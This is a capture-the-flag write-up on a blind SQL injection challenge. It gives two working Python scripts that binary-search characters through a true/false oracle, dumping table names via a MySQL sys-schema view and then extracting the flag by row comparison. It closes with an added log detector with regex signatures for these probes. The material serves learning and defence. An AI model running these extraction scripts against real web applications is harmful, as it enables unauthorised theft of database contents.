Entering the challenge
Gave me a scare; if they had at least put up a picture of 彭于晏 (Eddie Peng) I wouldn't have complained.
Let's submit a 1 and see.
1 and 1=1
1'#
Tried plenty of other things too, but all of them were filtered. Headache.
Looked at other people's writeups.
Turns out you have to write code to brute-force it!!! I can't do that yet, so I'll use someone else's code for now and make sure to learn it later.
The first script dumps the table names.
import requests
import time

url = "http://..........."
table_name = ""
i = 0
while True:
    i = i + 1
    # Binary search over printable ASCII (32..127) for the i-th character
    letf = 32
    right = 127
    while letf < right:
        mid = (letf + right) // 2
        # Table names are read from the sys schema view (a common alternative
        # when information_schema is blocked); 0^(cond) makes the page behave
        # as a true/false oracle
        payload = f"0^(ascii(substr((select group_concat(table_name) from sys.x$schema_table_statistics_with_buffer where table_schema = database()),{i},1))>{mid})"
        data = {"id": payload}
        res = requests.post(url=url, data=data).text
        if "Nu1L" in res:  # "Nu1L" in the response means the condition held
            letf = mid + 1
        else:
            right = mid
    if letf != 32:
        table_name += chr(letf)
        time.sleep(0.2)
        print(table_name)
    else:
        # ascii('') is 0, so the search settles at 32 once the string is exhausted
        break
Got the table names: giers233333333333333,f1ag_1s_h3r3_hhhhh
The second script uses that table name to dump the flag.
import requests
import time

url = "http://........."
flag = ""
i = 0

while True:
    i = i + 1
    # Binary search over printable ASCII (32..127) for the next character
    letf = 32
    right = 127
    while letf < right:
        s = flag
        mid = (letf + right) // 2
        s = s + chr(mid)
        # Compare the whole row with (1, known_prefix + candidate char); this
        # needs no column names, only the table name found above
        payload = f"0^((select * from f1ag_1s_h3r3_hhhhh)>(select 1,'{s}'))"
        data = {"id": payload}
        res = requests.post(url=url, data=data).text
        if "Nu1L" in res:  # "Nu1L" in the response means the row compared greater
            letf = mid + 1
        else:
            right = mid
    if letf != 32:
        # The search stops one past the real character, hence letf-1; with a
        # case-insensitive collation letters come back in uppercase
        flag += chr(letf - 1)
        print(flag)
        time.sleep(0.2)
    else:
        break
Got FLAG{E6AC8B59-EC60-4BC1-A3C9-C6B770B889CE}
i.e. flag{e6ac8b59-ec60-4bc1-a3c9-c6b770b889ce}
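From the defender's side, the two scripts above leave a very recognisable trail: hundreds of requests from one client whose id parameter carries ascii(substr(...))>N probes, a sys-schema view standing in for information_schema, or a row-versus-tuple comparison. The following detector, an added example that is not part of the original writeup, scans constructed application log lines (format and sample IPs are assumptions) for those signatures and reports clients that exceed a probe threshold:

```python
import re
from collections import defaultdict

# Constructed sample log (not from the original post): one entry per request,
# with client IP, method, path and the raw value of the POST parameter "id".
# The first four lines mirror the probes used in the writeup; the last is benign.
SAMPLE_LOG = """\
10.0.0.7 POST /index.php id=0^(ascii(substr((select group_concat(table_name) from sys.x$schema_table_statistics_with_buffer where table_schema = database()),1,1))>79)
10.0.0.7 POST /index.php id=0^(ascii(substr((select group_concat(table_name) from sys.x$schema_table_statistics_with_buffer where table_schema = database()),1,1))>103)
10.0.0.7 POST /index.php id=0^(ascii(substr((select group_concat(table_name) from sys.x$schema_table_statistics_with_buffer where table_schema = database()),1,1))>91)
10.0.0.7 POST /index.php id=0^((select * from f1ag_1s_h3r3_hhhhh)>(select 1,'FLAG{E'))
10.0.0.9 POST /index.php id=42
"""

# Signatures for the extraction techniques seen in the two scripts
SIGNATURES = {
    "char_by_char_ascii": re.compile(r"ascii\s*\(\s*substr\s*\(", re.I),
    "schema_via_sys_view": re.compile(r"sys\.x\$schema_table_statistics_with_buffer", re.I),
    "tuple_compare": re.compile(r"\(\s*select\s+\*\s+from\s+\w+\s*\)\s*>\s*\(\s*select\s+\d+\s*,\s*'", re.I),
    "xor_boolean_probe": re.compile(r"^\s*0\s*\^\s*\(", re.I),
}
LINE_RE = re.compile(r"^(?P<ip>\S+)\s+(?P<method>\S+)\s+(?P<path>\S+)\s+id=(?P<id>.*)$")


def classify(param):
    """Return the sorted list of signature names matching one id value."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(param))


def analyse(log_text, threshold=3):
    """Return {ip: {"probes": n, "techniques": [...]}} for every client whose
    number of flagged requests reaches `threshold` (binary search needs ~7
    probes per character, so a real run is far above this)."""
    per_ip = defaultdict(lambda: {"probes": 0, "techniques": set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than fail the whole run
        hits = classify(m["id"])
        if hits:
            per_ip[m["ip"]]["probes"] += 1
            per_ip[m["ip"]]["techniques"].update(hits)
    return {ip: {"probes": d["probes"], "techniques": sorted(d["techniques"])}
            for ip, d in per_ip.items() if d["probes"] >= threshold}


if __name__ == "__main__":
    for ip, report in analyse(SAMPLE_LOG).items():
        print(ip, report["probes"], ", ".join(report["techniques"]))
```

The real fix is a parameterised query on the id parameter; the detector only tells you who was probing and which trick they used.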
Notes
Learn how to write Python scripts.